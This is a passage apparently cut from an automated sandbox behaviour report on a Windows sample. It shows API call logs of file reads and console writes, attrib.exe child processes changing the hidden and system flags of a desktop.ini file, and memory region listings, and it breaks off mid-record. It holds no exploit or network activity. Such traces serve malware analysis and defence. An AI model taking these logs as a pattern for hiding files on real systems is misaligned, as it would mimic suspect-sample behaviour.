(_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.914] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.914] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] GetFileType (hFile=0x4c) returned 0x1 [0143.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.914] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] GetFileType (hFile=0x4c) returned 0x1 [0143.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.915] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.915] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.916] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.917] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.917] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] GetFileType (hFile=0x4c) returned 0x1 [0143.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.917] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.918] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x32, lpOverlapped=0x0) returned 1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.918] GetFileType (hFile=0x4c) returned 0x1 [0143.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x32, lpOverlapped=0x0) returned 1 [0143.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.919] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.919] _close (_FileHandle=4) returned 0 [0143.919] FindNextFileW (in: hFindFile=0xf0ea0, lpFindFileData=0x2ef5d4 | out: lpFindFileData=0x2ef5d4) returned 0 [0143.919] GetLastError () returned 0x12 [0143.919] FindClose (in: hFindFile=0xf0ea0 | out: hFindFile=0xf0ea0) returned 1 [0143.919] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0143.920] _close (_FileHandle=3) returned 0 [0143.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.920] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.920] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.921] SetConsoleInputExeNameW () returned 0x1 [0143.921] GetConsoleOutputCP () returned 0x1b5 [0143.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.921] exit (_Code=0) Process: id = "191" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "187" os_parent_pid = "0xfdc" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16900 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16901 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16902 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16903 start_va = 0x110000 end_va = 0x116fff entry_point = 0x110000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16904 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 16905 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16906 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16907 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16908 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 16909 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16910 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16911 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16912 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16913 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 16914 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 16915 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16916 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16917 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16918 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16919 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16920 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16921 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16922 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16923 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16924 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16925 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16926 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16927 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 16928 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16929 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 248 os_tid = 0x9c4 Process: id = "192" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0x878" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "187" os_parent_pid = "0xfdc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16982 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16983 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16984 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16985 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 16986 start_va = 0x170000 end_va = 0x176fff entry_point = 0x170000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16987 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16988 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16989 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16990 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 16991 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16992 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16993 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16994 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16995 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 16996 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 16997 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16998 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16999 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17000 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17001 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17002 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17003 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17004 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17005 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17006 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17007 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17008 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17009 start_va = 0x180000 end_va = 0x247fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 17010 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 